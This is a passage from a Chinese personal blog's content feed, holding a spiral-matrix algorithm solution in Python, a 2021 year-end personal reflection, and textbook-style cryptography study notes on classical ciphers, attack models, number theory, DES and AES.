(tx,ty) <span class="keyword">not</span> <span class="keyword">in</span> visited: <span class="comment"># 判断坐标是否需变向,且没有遍历过</span></span><br><span class="line"> x,y = tx,ty </span><br><span class="line"> <span class="keyword">else</span>: </span><br><span class="line"> di = (di+<span class="number">1</span>)%<span class="number">4</span> <span class="comment"># 改变方向,右下左上为一圈,防止方向坐标越界</span></span><br><span class="line"> x,y = x + dx[di],y+dy[di] <span class="comment"># 下一步坐标</span></span><br><span class="line"> <span class="keyword">return</span> res</span><br></pre></td></tr></table></figure><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Solution</span>(<span class="title class_ inherited__">object</span>):</span><br><span class="line"> <span class="keyword">def</span> <span class="title function_">spiralOrder</span>(<span class="params">self, matrix</span>):</span><br><span class="line"> <span class="string">"""</span></span><br><span class="line"><span class="string"> :type matrix: List[List[int]]</span></span><br><span class="line"><span class="string"> :rtype: List[int]</span></span><br><span class="line"><span class="string"> """</span></span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> matrix <span class="keyword">or</span> <span class="keyword">not</span> matrix[<span class="number">0</span>]: <span class="keyword">return</span> []</span><br><span class="line"> M, N = <span class="built_in">len</span>(matrix), <span class="built_in">len</span>(matrix[<span class="number">0</span>])</span><br><span class="line"> left, right, up, down = <span class="number">0</span>, N - <span class="number">1</span>, <span class="number">0</span>, M - <span class="number">1</span></span><br><span class="line"> res = []</span><br><span class="line"> x, y = <span class="number">0</span>, <span class="number">0</span></span><br><span class="line"> dirs = [(<span class="number">0</span>, <span class="number">1</span>), (<span class="number">1</span>, <span class="number">0</span>), (<span class="number">0</span>, -<span class="number">1</span>), (-<span class="number">1</span>, <span class="number">0</span>)]</span><br><span class="line"> cur_d = <span class="number">0</span></span><br><span class="line"> <span class="keyword">while</span> <span class="built_in">len</span>(res) != M * N:</span><br><span class="line"> res.append(matrix[x][y])</span><br><span class="line"> <span class="keyword">if</span> cur_d == <span class="number">0</span> <span class="keyword">and</span> y == right:</span><br><span class="line"> cur_d += <span class="number">1</span></span><br><span class="line"> up += <span class="number">1</span></span><br><span class="line"> <span class="keyword">elif</span> cur_d == <span class="number">1</span> <span class="keyword">and</span> x == down:</span><br><span class="line"> cur_d += <span class="number">1</span></span><br><span class="line"> right -= <span class="number">1</span></span><br><span class="line"> <span class="keyword">elif</span> cur_d == <span class="number">2</span> <span class="keyword">and</span> y == left:</span><br><span class="line"> cur_d += <span class="number">1</span></span><br><span class="line"> down -= <span class="number">1</span></span><br><span class="line"> <span class="keyword">elif</span> cur_d == <span class="number">3</span> <span class="keyword">and</span> x == up:</span><br><span class="line"> cur_d += <span class="number">1</span></span><br><span class="line"> left += <span class="number">1</span></span><br><span class="line"> cur_d %= <span class="number">4</span></span><br><span class="line"> x += dirs[cur_d][<span class="number">0</span>]</span><br><span class="line"> y += dirs[cur_d][<span class="number">1</span>]</span><br><span class="line"> <span class="keyword">return</span> res</span><br></pre></td></tr></table></figure><p>大神版:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">spiralOrder</span>(<span class="params">self, matrix: <span class="type">List</span>[<span class="type">List</span>[<span class="built_in">int</span>]]</span>) -> <span class="type">List</span>[<span class="built_in">int</span>]:</span><br><span class="line"> res = []</span><br><span class="line"> <span class="keyword">while</span> matrix:</span><br><span class="line"> <span class="comment"># 削头(第一层)</span></span><br><span class="line"> res += matrix.pop(<span class="number">0</span>)</span><br><span class="line"> <span class="comment"># 将剩下的逆时针转九十度,等待下次被削</span></span><br><span class="line"> matrix = <span class="built_in">list</span>(<span class="built_in">zip</span>(*matrix))[::-<span class="number">1</span>]</span><br><span class="line"> <span class="keyword">return</span> res</span><br></pre></td></tr></table></figure>]]></content>
<categories>
<category> 算法 </category>
</categories>
</entry>
<entry>
<title>2021总结</title>
<link href="/2022/01/03/%E5%B9%B4%E6%80%BB%E7%BB%93/"/>
<url>/2022/01/03/%E5%B9%B4%E6%80%BB%E7%BB%93/</url>
<content type="html"><![CDATA[<p>岁月蹉跎,转眼已快毕业。2021年还算平稳度过。</p><p>本来想直接就业,3,4月投了很多实习简历,也经历过几次面试。大部分公司石沉大海,直至今日,仍无反应。唯阿里最为迅速,美团最主动,各个部门经常打电话过来。面了几家大厂和乙方龙头企业,都没有如意的结果。深知实战经验缺乏,又难以快速提升。遂作罢,走上考研之路。</p><p>上半年课不算多,都以小组做项目为主,结课之前没有多少时间可以静心复习。</p><ul><li>信息检索:最后写一个小的网页检索项目,基于语言建模的信息检索模型、基于机器学习的排序方法和Web搜索技术、文本聚类技术等。</li><li>内容安全:社交媒体/网页中的广告检测项目。</li><li>舆情分析:*国智库人物画像项目。主要内容是文本情感分析。</li></ul><p>真正开始复习是暑假7月份。因为一些契机,也因为不想在基地待下去,报了一个自命题的学校。寻找资料很难,真题都没有,也很少有可以交流的同学。</p><p>一切时间都要靠自己安排,不像高中那样,只跟老师走就行了。这一路也是兜兜转转,不同的老师,不同的资料,转来转去。从汤家凤到张宇,再到武老师。尤其概率,从余炳森,到汤家凤,到王式安,到张宇,最后是方浩。</p><p>半年来,认识了很多真正的好老师。田静,徐涛,武忠祥,李永乐等。虽未谋面,但却像真正耳提面命一般,一路陪伴着我们。</p><p>不知道新的一年,我将在哪里。不管结果如何,上天都会有最好的安排。</p><p>向前走吧。</p>]]></content>
<categories>
<category> 感悟 </category>
</categories>
</entry>
<entry>
<title>密码学笔记</title>
<link href="/2022/01/03/crypto/"/>
<url>/2022/01/03/crypto/</url>
<content type="html"><![CDATA[<blockquote><p>李卫海PPT学习笔记</p></blockquote><h4 id="其他概念"><a href="#其他概念" class="headerlink" title="其他概念"></a>其他概念</h4><p><strong>Needham-Schroeder协议</strong>:</p><p>利用对称密码技术分发密钥。A,B分别与T有静态密钥。借助信任权威T,分发对称密钥Kab</p><p>多项式GCD算法</p><p>重点:<strong>模重复平方算法</strong></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">c=<span class="number">1</span></span><br><span class="line"><span class="keyword">for</span> i =k-<span class="number">1</span> to <span class="number">0</span>:</span><br><span class="line"> c=(c^<span class="number">2</span>)mod n</span><br><span class="line"> <span class="keyword">if</span> ei==<span class="number">1</span>:</span><br><span class="line"> c=c*m mod n</span><br><span class="line"> <span class="keyword">return</span></span><br></pre></td></tr></table></figure><p>难点:AES列混合矩阵计算,有限域上的多项式模运算。</p><p><strong>对合算法</strong></p><p>对合运算:f =f‘ ,模 2加运算是对合运算。<br>密码算法是对和运算,则加密算法=解密算法,工程实现工<br>作量减半。</p><p><strong>同态加密</strong>(英语:Homomorphic encryption)是一种加密形式,它允许人们对密文进行特定形式的代数运算得到仍然是加密的结果,将其解密所得到的结果与对明文进行同样的运算结果一样。换言之,这项技术令人们可以在加密的数据中进行诸如检索、比较等操作,得出正确的结果,而在整个处理过程中无需对数据进行解密。其意义在于,真正从根本上解决将数据及其操作委托给第三方时的保密问题,例如对于各种云计算的应用。</p><p><strong>零知识证明</strong>是一种特殊的交互式证明,其中证明者知道问题的答案,他需要向验证者证明“他知道答案”这一事实,但是要求验证者不能获得答案的任何信息。</p><p>可以参考这样一个简单的例子。证明者和验证者都拿到了一个数独的题目,证明者知道一个解法,他可以采取如下这种零知识证明方法:他找出81张纸片,每一张纸片上写上1到9的一个数字,使得正好有9份写有从1到9的纸片。然后因为他知道答案,他可以把所有的纸片按照解法放在一个9乘9的方格内,使得满足数独的题目要求(每列、每行、每个九宫格都正好有1到9)。放好之后他把所有的纸片翻转,让没有字的一面朝上。这样验证者没办法看到纸片上的数字。接下来,验证者就验证数独的条件是否满足。比如他选一列,这时证明者就把这一列的纸片收集起来,把顺序任意打乱,然后把纸片翻过来,让验证者看到1到9的纸片都出现了。整个过程中验证者都无法得知每张纸片的位置,但是却能验证确实是1到9都出现了。</p><p><strong>字频统计攻击</strong></p><p>对凯撒密码,通过识别a-e-i或r-s-t三元组的峰,或jk和xyz的特征,可以获得密钥</p><p>对单表替换密码,破译步骤:</p><ul><li>统计密文字母出现频率</li><li>将统计结果与自然语言频率表对比,确定部分密钥</li><li>结合连接特征和重复特征,确定部分密钥</li><li>双、三字母的频率统计表往往很有帮助</li><li>从语义上,猜测其它密钥</li></ul><p><strong>已知明文攻击</strong>(Known plaintext attack)是一种攻击模式,指攻击者掌握了某段明文 x 和对应密文 y。</p><p>在所有密码分析中,均假设攻击者知道正在使用的密码体制,该假设称为科克霍夫假设。而已知明文攻击也假设攻击者能够获取部分明文和相应密文,如截取信息前段,通过该类型攻击获取加密方式,从而便于破解后段密文。</p><p>希尔密码依赖唯密文攻击较难破解,而通过已知明文攻击则容易攻破。</p><p>**选择明文攻击 **在这种攻击模式中,攻击者可以事先任意选择一定数量的明文,让被攻击的加密算法加密,并得到相应的密文。攻击者的目标是通过这一过程获得关于加密算法的一些信息,以利于攻击者在将来更有效的破解由同样加密算法(以及相关密钥)加密的信息。在最坏情况下,攻击者可以直接获得解密用的钥匙。</p><p>这种攻击模式初看起来并不现实,因为很难想像攻击者可以选择任意的信息并要求加密系统进行加密。不过,在公钥密码学中,这就是一个很现实的模式。这是因为公钥密码方案中,加密用的钥匙是公开的,这样攻击者就可以直接用它来加密任意的信息。</p><p><strong>选择密文攻击</strong> 在密码分析中,选择密文攻击指的是一种攻击方式。攻击者掌握对解密机的访问权限,可构造任意密文所对应的明文x。在此种攻击模型中,密码分析者事先任意搜集一定数量的密文,让这些密文透过被攻击的加密算法解密,透过未知的密钥获得解密后的明文。</p><p><strong>唯密文攻击</strong>指的是在仅知已加密文字(即密文)的情况下进行攻击。此方案可同时用于攻击对称密码体制和非对称密码体制。<br>唯密文攻击所希望达到的目的包括几种,依照成功的程度排列:</p><p>取得原始明文中的部分资讯。<br>取得原始明文。<br>得知解密用的钥匙。<br>穷举法是属于一种唯密文攻击,但一般在设计算法时都会考虑到穷举法。</p><p><strong>一次性密码本</strong>(英语:one-time pad,缩写为OTP)是古典密码学中的一种加密算法。是以随机的密钥(key)组成明文,且只使用一次。</p><p>在理论上,此种密码具有完善保密性,是牢不可破的。它的安全性已由·香农所证明。</p><p>虽然它在理论上的安全性无庸置疑,但在实际操作上却有着以下的问题:</p><p>用以加密的文本,也就是一次性密码本,必须确实是随机产生的。<br>它至少必须和被加密的文件等长。<br>用以加密的文本只能用一次,且必须对非关系人小心保密,不再使用时,用以加密的文本应当要销毁,以防重复使用。</p><p><strong>生日攻击</strong> 生日攻击是一种密码学攻击手段,所利用的是概率论中生日问题的数学原理。这种攻击手段可用于滥用两个或多个集团之间的通信。此攻击依赖于在随机攻击中的高碰撞概率和固定置换次数(鸽巢原理)。攻击者可在</p><p><img src="https://s2.loli.net/2022/02/04/TYV1f5RFnMSIycg.png" alt="image-20210713213656807"></p><p>中找到散列函数碰撞,2^n 为原像抗性安全性。</p><p><strong>重合指数法</strong>:所有字母出现概率的平方的和接近0.065,这个值称为重合指数。</p><p><strong>数据扩散</strong>:改变明文的任何一位,密文通常有一半的位数发生变化。</p><p><strong>数据混淆</strong>:改变密钥的任何一位,密文通常有一半的位数发生变化。</p><p>所谓扩散就是让明文中的每一位影响密文中的许多位,或者说让密文中的每一位受明文中的许多位的影响.这样可以隐蔽明文的统计特性.当然,理想的情况是让明文中的每一位影响密文中的所有位,或者说让密文中的每一位受明文中所有位的影响.<br>所谓混淆就是将密文与密钥之间的统计关系变得尽可能复杂,使得对手即使获取了关于密文的一些统计特性,也无法推测密钥.使用复杂的非线性代替变换可以达到比较好的混淆效果,而简单的线性代替变换得到的混淆效果则不理想.</p><p><strong>仿射密码</strong></p><img src="https://s2.loli.net/2022/02/04/7ar2vu5BgimSbEt.png" alt="image-20210919212715548" style="zoom:67%;" /><p>代换密码要先建立一个替换表(即密钥),加密时将需要加密的明文依次通过查表,替换为相应的字符,明文字符被逐个替换后,生成无任何意义的字符串,即密文。<br>置换密码是对明文字符按某种规律进行位置的置换。</p><p><strong>中间人攻击</strong></p><p>SP网络(代换-置换网络)</p><p>Substitution-Permutation Network,缩写作SP-network或SPN</p><p>S一般被称为混淆层,主要起混淆作用<br>P一般被称为扩散层,主要起扩散作用</p><p><strong>代换起混淆作用,置换起扩散作用</strong></p><p><strong>DES</strong></p><p>面向二进制数据的密码算法<br>因而能够加解密任何形式的计算机数据。</p><p>S盒起混淆作用</p><p>改变S盒的任一输入比特,其输出至少有两比特发生改变</p><p>置换运算P起扩散作用</p><img src="https://s2.loli.net/2022/02/04/qS8OenFyuwxCBrV.png" alt="image-20211110215431361" style="zoom:67%;" /><img src="https://s2.loli.net/2022/02/04/qPegX8ZwhODyN9c.png" alt="image-20211110215415819" style="zoom:67%;" /><p>弱点</p><img src="https://s2.loli.net/2022/02/04/EY3gGtwTCV56mjI.png" alt="image-20211110215618739" style="zoom:50%;" /><p><strong>AES</strong></p><p>面向二进制的密码算法<br>能够加解密任何形式的计算机数据。<br>不是对合运算,加解密使用不同的算法</p><p>最后一轮的轮变换中没有列混合变换。</p><img src="https://s2.loli.net/2022/02/04/NkzAwQjcs4ZtO3P.png" alt="image-20211114232150250" style="zoom:50%;" /><p>密钥备份和恢复只能针对加解密密钥,无法对签名密钥进行备份。</p><h4 id="第一章-绪论"><a href="#第一章-绪论" class="headerlink" title="第一章-绪论"></a>第一章-绪论</h4><p>密码体制的基本要素:</p><ul><li>密码算法</li><li>密钥</li></ul><p>密码系统的数学描述:</p><p>S={P,C,K,E,D} 其中,明文空间P也常用消息空间M</p><p><img src="https://s2.loli.net/2022/02/04/oKjpl4Y6t1ANLGZ.png" alt="image-20210713213509244"></p><p>现代密码学基本原则:</p><ul><li>柯克霍夫原则(Kerckhoff’s principle)<br>除了密钥之外,即使密码系统的一切均被公开,它仍然应当是安全的。</li><li>香农箴言(Shannon’s maxim)<br>敌人了解系统。</li><li>密码系统的安全性不在于算法的保密,而在于当对手获知了算法和密文后,分析出密钥或明文的难度。</li></ul><p>密码提之的安全性:</p><ul><li>无条件安全</li><li>可证明安全</li><li>计算上安全</li><li>实际安全</li></ul><p>通信信道加密方式:</p><ul><li>链路加密–点到点加密</li><li>高层链接加密–端到端加密</li></ul><p>存储数据的加密:</p><ul><li>硬盘级加密</li><li>文件级加密</li></ul><p>攻击方法</p><table><thead><tr><th><strong>攻击类型</strong></th><th><strong>密码分析员的资源</strong></th></tr></thead><tbody><tr><td><strong>唯密文攻击</strong> Ciphtext-only</td><td>密码算法 待分析密文</td></tr><tr><td><strong>已知明文攻击</strong> Known-plaintext</td><td>密码算法 待分析密文 用同一密钥加密的一个或多个明文-密文对</td></tr><tr><td><strong>选择密文攻击</strong> Chosen-ciphertext</td><td>密码算法 待分析密文 可选择特定密文,并获得对应的明文</td></tr><tr><td><strong>选择明文攻击</strong> Chosen-plaintext</td><td>密码算法 待分析密文 可选择特定明文,并获得对应的密文</td></tr><tr><td><strong>选择文本攻击</strong> Chosen-text</td><td>密码算法 待分析密文 可选择特定密文/明文,并获得对应的明文/密文</td></tr><tr><td><strong>相关密钥攻击</strong> Related-key</td><td>密码算法 待分析密文 有确定关系的两个密钥对应的明文-密文对</td></tr></tbody></table><p>序列密码体制 / 流密码体制(Stream Cipher)</p><ul><li>以比特(有时也用字节)为单位进行加密/解密运算</li><li>同一明文对应的密文一般不同</li></ul><p>分组密码体制(Block Cipher)</p><ul><li>以若干比特(通常大于64比特)的数据块为处理单元</li><li>同一明文块对应的密文块相同</li></ul><p>根据密文的唯一性分类:</p><ul><li>确定型密码体制</li><li>概率型密码体制</li></ul><p>明文:Plaintext,Message</p><p>密文:Ciphertext</p><p>目前,衡量一个密码系统是否安全的一个通用的做法是:公开接受来自全世界的研究和攻击。</p><h4 id="第二章-经典密码学"><a href="#第二章-经典密码学" class="headerlink" title="第二章-经典密码学"></a>第二章-经典密码学</h4><p>代换(Substitution)<br>明文内容的表示形式改变,内容元素之间相对位置不变<br>明文字母用密文中对应字母代替</p><p>置换(Transposition or Permutation)<br>明文内容元素的相对位置改变,内容的表示形式不变</p><p>乘积密码(Product Ciphers)<br>多个加密技术的叠加</p><h5 id="算术密码"><a href="#算术密码" class="headerlink" title="算术密码"></a>算术密码</h5><p><strong>1.移位密码</strong></p><p>凯撒密码</p><p>将每个字母用字母表中它之后的第k个字母替代<br>C = E(k, p) = (p+k) mod 26,p = D(k, C) = (C-k) mod 26<br>一些文献中认为Caesar固定使用k=3</p><p><strong>2.仿射密码</strong></p><p>密钥:a,b<br>加密:C = E([a,b], p) = (ap+b) mod 26<br>解密:p = D([a,b], C) = ((C-b)/a) mod 26</p><p>a=1时,蜕化为凯撒密码。这里不考虑。<br>a≠0时,b无限制。<br>相当于b=0的仿射加密后,再叠加一次凯撒加密。<br>a的取值有限制:gcd(a,26)=1<br>a=3,5,7,9,11,15,17,19,21,23,25<br>否则不能保证一一映射<br>例:a=2, b=1时,p=3->C=7; p=16->C=7<br>不同的明文对应同一密文,无法解密<br>密钥空间大小为11*26=286</p><p><strong>3.HILL密码</strong></p><p>密钥:m*m个密钥</p><p>加密:每次加密m个明文字母</p><img src="https://i.loli.net/2021/07/21/46I7umDKBhrfzMi.png" alt="image-20210721220734130" style="zoom:67%;" /><img src="https://i.loli.net/2021/07/21/HEd3ZAVWO7P5wus.png" alt="image-20210721220911593" style="zoom:67%;" /><p>解密(要求K可逆)</p><img src="https://i.loli.net/2021/07/21/1jnopkaXBTLYhJg.png" alt="image-20210721220926003" style="zoom:67%;" /><p>安全性:掩盖频率信息</p><p>抵抗唯密文攻击</p><p>易受已知明文攻击</p><h5 id="代换密码"><a href="#代换密码" class="headerlink" title="代换密码"></a>代换密码</h5><p>1.单表代换密码</p><p>经典密码破译:</p><ul><li>频率特征(单字母,双字母,三字母)</li><li>连接特征</li><li>重复特征</li></ul><p>2.Playfair密码——二维单表代换</p><p><img src="https://i.loli.net/2021/07/21/btaUz9fE8GHFpoB.png" alt="image-20210721223610875"></p><p>加密方法:</p><p>每次加密或解密两个字母</p><p>加密规则:</p><ul><li>如果两字母是重复的,则在其中插入字母x。<br>例如balloon划分为ba lx lo on</li><li>如果两字母位于同一行,则各自用右侧字母代换。<br>例如ar->RM</li><li>如果两字母位于同一列,则各自用下侧字母代换。<br>例如mu->CM</li><li>否则各自用同行异列字母代换。<br>例如hs->BP;ea->IM或JM</li></ul><p>3.多表代换加密(抵抗字频统计攻击)</p><p>4.维吉尼亚密码</p><p>加密算法:Ci = E(k, pi) = (pi+ki mod d) mod 26<br>解密算法:pi = D(k, Ci) = (Ci-ki mod d) mod 26</p><p>攻击方法:</p><p>若获得了替换表的个数(密钥长)d,则可以逐个分析</p><p>分析位于i,i+d,i+2d,…的密文,获得密钥ki</p><ul><li>密钥:deceptive,d=9明文</li><li>密文:ZICVTWQNGRZGVTWAVZHCQYGLMGJ</li><li>重排列,在每一列上进行字频攻击</li></ul><p>寻找密钥长度d</p><p>vKasiski方法</p><ul><li>在密文中寻找重复字段</li><li>计算重复字段的间距</li><li>密钥长度d应是这些间距的公约数</li></ul><p>5.Autokey密码</p><p>加解密密钥= ”密钥” + ”明文”</p><h5 id="置换技术"><a href="#置换技术" class="headerlink" title="置换技术"></a>置换技术</h5><p>重新排序隐藏信息</p><h5 id="乘积密码"><a href="#乘积密码" class="headerlink" title="乘积密码"></a>乘积密码</h5><p>两次代换可以构造更复杂的代换,等效为一次规则复杂的代换<br>两次置换可以构造更复杂的置换,等效为一次规则复杂的置换<br>交替使用代换和置换,可以大大提高安全性</p><h4 id="第三章-密码学基础理论(8-4)"><a href="#第三章-密码学基础理论(8-4)" class="headerlink" title="第三章-密码学基础理论(8.4)"></a>第三章-密码学基础理论(8.4)</h4><p>密码系统运算</p><ul><li>构建复杂密码</li><li>分析合成密码系统</li></ul><p>1.先验概率,后验概率</p><p>2.闭合系统,非闭合系统</p><p><strong>同构</strong>:定义:若密码系统T的消息空间与密文空间相同,则称它是自同构的。<br>若密码系统T是自同构的,则可定义指数运算:</p><p><strong>幂等</strong>:定义:若密码系统T满足TT=T,则称它是幂等的。<br>维吉尼亚密码是幂等的</p><p>单纯密码,混合密码</p><p>相似密码系统</p><p>信息量:H(x)</p><p>冗余,冗余度</p><p>完美安全:完美安全一般用于加密最重要的信息,或者消息集很小的场合。</p><p>消息模糊度</p><p>密钥模糊度</p><p>唯一解距离</p><p>内容:数论基础</p><h5 id="第一节-有限域"><a href="#第一节-有限域" class="headerlink" title="第一节 有限域"></a>第一节 有限域</h5><p><strong>群,环,域</strong></p><p>有限群的阶等于群中元素的个数</p><p>有限群,交换群(阿贝尔群),</p><p>循环群:如果群中的每一个元素都是一个固定的元素a(a∈G)的幂ak(k为整数),则称群G为循环群。<br>元素a生成了群G,或者说a是群G的生成元。</p><p><strong>关系图</strong></p><p><img src="https://i.loli.net/2021/08/05/RBuJVqm5lUso4p3.png" alt="image-20210805204923411"></p><p><strong>模运算</strong></p><p>a=qn + r 0≤r<n; q=⌊a/n⌋ </p><p><img src="https://i.loli.net/2021/08/07/UjVbwM95mTE8tQc.png" alt="image-20210807230847616"></p><p><img src="https://s2.loli.net/2022/02/04/PrdLlkwV4uhD5Jm.png" alt="image-20210913223741755"></p><p><img src="https://s2.loli.net/2022/02/04/tkEDHerg5Gj8PY2.png" alt="image-20210917200006538"></p><p><strong>同余</strong></p><p>整数a, b及n≠0, 当且仅当a-b=kn时,a与b是模n同余,记为 a≡b mod n</p><p>a≡b mod n当且仅当 a mod n = b mod n</p><p>如果a=mb, 其中 a,b,m 为整数,则当b≠0时,称b能整除a, b是a的一个因子,或a除以b余数为0,记为b|a</p><p>如果n|(a-b), 则a≡b mod n</p><p>加法逆元,乘法逆元</p><ul><li>加法表</li><li>乘法表</li><li>逆元表</li></ul><p>模n的完全剩余类集</p><p><strong>有限域</strong></p><p><strong>多项式计算</strong></p><p>有限域GF(2n)上的多项式计算</p><p><strong>素多项式</strong></p><p>任何多项式可以写为:f(x)=q(x)g(x)+r(x)<br>r(x)称为余式<br>r(x)=f(x) mod g(x)</p><p>若不存在余式,则称g(x)整除f(x),g(x)|f(x)</p><p>若f(x)除了它本身和1外,不存在其它因式,则称f(x)是不可约多项式,或既约多项式、素多项式</p><p>系数在GF(p)中,以素多项式取模的多项式构成一个域</p><p><strong>欧几里得算法</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">a可以表示成a = kb + r(a,b,k,r皆为正整数,且r<b),则r = a mod b</span><br><span class="line">假设d是a,b的一个公约数,记作d|a,d|b,即a和b都可以被d整除。</span><br><span class="line">而r = a - kb,两边同时除以d,r/d=a/d-kb/d=m,由等式右边可知m为整数,因此d|r</span><br><span class="line">因此d也是b,a mod b的公约数</span><br><span class="line">假设d是b,a mod b的公约数, 则d|b,d|(a-k*b),k是一个整数,</span><br><span class="line">进而d|a.因此d也是a,b的公约数</span><br><span class="line">因此(a,b)和(b,a mod b)的公约数是一样的,其最大公约数也必然相等,得证。</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">对于任何可以整除a和b的整数,那么它也一定能整除a-b(和b),因此我们选择该整数(前面提到的任何整数)为gcd(a,b),它一定比a-b和b的最大公约数小:gcd(a,b)<=gcd(a-b,b)</span><br><span class="line">同理,任何可以整除a-b和b的整数,一定可以整除a和b,因此我们选择该整数为gcd(a-b,b),它一定比a和b的最大公约数小:gcd(a-b,b)<=gcd(a,b)</span><br><span class="line">由此可知:gcd(a,b)=gcd(a-b,b)</span><br><span class="line">因为总有整数n,使得 a - n*b = a mod b,</span><br><span class="line">所以迭代可知:gcd(a-b,b)=gcd(a-2b,b)=...=gcd(a-n*b,b)=gcd(a mod b,b)</span><br></pre></td></tr></table></figure><p>gcd(a,b)=gcd(a mod b, b)</p><p>若a和b只有唯一的正公因子1,则称整数a和b是互素的,即gcd(a, b)=1</p><p><strong>扩展欧几里得</strong></p><p>求d=gcd(a,b),并解ax+by=d</p><h5 id="第二节-素数"><a href="#第二节-素数" class="headerlink" title="第二节 素数"></a>第二节 素数</h5><p>素数有无限多个</p><p>费马数</p><p>梅森素数</p><p>完全数</p><p>素因子分解</p><p>任一正整数可通过列出所有素因子的非零指数分量来表示<br>例:12可以表示为{a2=2, a3=1}<br>例:18可以表示为{a2=1, a3=2}</p><p>两个数的乘法等同于对应指数分量的加法:<br>K = mn → kp = mp + np 对所有p<br>例:216=12×18=(22×31)×(21×32)=23×33</p><p>最大公约数:k=gcd(a,b) <=> 所有kp=min(ap,bp)<br>例:300=22×31×52, 18=21×32 gcd(18,300)=21×31×50=6</p><p><strong>费马定理</strong></p><img src="https://i.loli.net/2021/08/07/cXzhNYBFvwraeW2.png" alt="image-20210807223557784" style="zoom: 80%;" /><p><strong>欧拉定理</strong></p><p><img src="https://i.loli.net/2021/08/08/GzmwgihMy5brRLo.png" alt="image-20210808111928181"></p><p><img src="https://i.loli.net/2021/08/08/1htH3TPo8MV5ynk.png" alt="image-20210808122519540"></p><p><img src="https://i.loli.net/2021/08/08/LlYEVvyS3Crs8Pk.png" alt="image-20210808115027528"></p><p><strong>中国剩余定理</strong></p><img src="https://i.loli.net/2021/08/08/rlMOxLmitIQhfUN.png" alt="image-20210808122417972" style="zoom:67%;" /><p><strong>阶</strong></p><img src="https://i.loli.net/2021/08/08/yNo5dQIETesCPtn.png" alt="image-20210808205302384" style="zoom:80%;" /><p><strong>原根</strong></p><p><img src="https://i.loli.net/2021/08/08/16C2hWIXPsDeJzS.png" alt="image-20210808205601708"></p><p>原根的模数不一定是素数:5是模6的一个原根</p><p>原根未必唯一</p><p>所有的奇数都是模2的原根</p><p><img src="https://i.loli.net/2021/08/08/Nuk31OtlI9qTFov.png" alt="image-20210808210709152"></p><p><img src="https://i.loli.net/2021/08/08/PRhsxig6umQkO7n.png" alt="image-20210808211446013"></p><p><strong>算术基本定理</strong></p><p><img src="https://i.loli.net/2021/08/08/yt89C3eGrsFSgp2.png" alt="image-20210808214234027"></p><p>DH算法</p><img src="https://i.loli.net/2021/09/02/INCSgadQzt21lpV.png" alt="image-20210902223744193" style="zoom: 50%;" /><img src="https://s2.loli.net/2022/02/04/wnMltXKpydfQ3sA.png" alt="image-20210913221636557" style="zoom:67%;" /><p>扩展欧几里得</p><p>求乘法逆元</p><h4 id="第四章-分组密码"><a href="#第四章-分组密码" class="headerlink" title="第四章-分组密码"></a>第四章-分组密码</h4><h5 id="第一节-DES"><a href="#第一节-DES" class="headerlink" title="第一节 DES"></a>第一节 DES</h5><p>Feistel密码结构</p><p>DES 64位密钥</p><p>实际只使用56位</p><p>其它用作奇偶校验等</p><p>雪崩效应就是一种不稳定的平衡状态也是加密算法的一种特征,它指明文或密钥的少量变化会引起密文的很大变化,就像雪崩前,山上看上去很平静,但是只要有一点问题,就会造成一片大崩溃。 可以用在很多场合对于Hash码,雪崩效应是指少量消息位的变化会引起信息摘要的许多位变化。指加密算法(尤其是块密码和加密散列函数)的一种理想属性。雪崩效应是指当输入发生最微小的改变(例如,反转一个二进制位)时,也会导致输出的不可区分性改变(输出中每个二进制位有50%的概率发生反转)。合格块密码中,无论密钥或明文的任何细微变化都必须引起密文的不可区分性改变。</p><p>构造一个具备良好雪崩效应的密码或散列是至关重要的设计目标之一。</p><p>计时攻击</p><p>能量攻击</p><p>DES能够很好地抵抗计时攻击</p><p>DES不能抵御差分分析、线性分析</p><p>差分密码攻击</p><ul><li>分析明文对的差异和密文对的差异之间的关系</li><li>确定轮运算的子密钥,从而恢复某些密钥比特</li></ul><p>线性密码分析</p><p>DES的设计标准</p><h5 id="第二节有限域计算"><a href="#第二节有限域计算" class="headerlink" title="第二节有限域计算"></a>第二节有限域计算</h5><h5 id="第三节-AES"><a href="#第三节-AES" class="headerlink" title="第三节 AES"></a>第三节 AES</h5><p>密钥长度:128,192,256</p><p>不是Feistel结构</p><p>字节代换、行移位、列混淆三个阶段一起提供了混淆、扩散和非线性功能。这些阶段不涉及密钥,其本身并不提供安全性</p><img src="https://s2.loli.net/2022/02/04/KPJv3nkTxh6o9IQ.png" alt="image-20210917224400452" style="zoom:67%;" /><h5 id="第四节-分组密码工作模式"><a href="#第四节-分组密码工作模式" class="headerlink" title="第四节 分组密码工作模式"></a>第四节 分组密码工作模式</h5><p><img src="https://s2.loli.net/2022/02/04/hr1TCDH7ZxYVjEy.png" alt="image-20210917233643054"></p><p>不同分组模式的优缺点。</p><h5 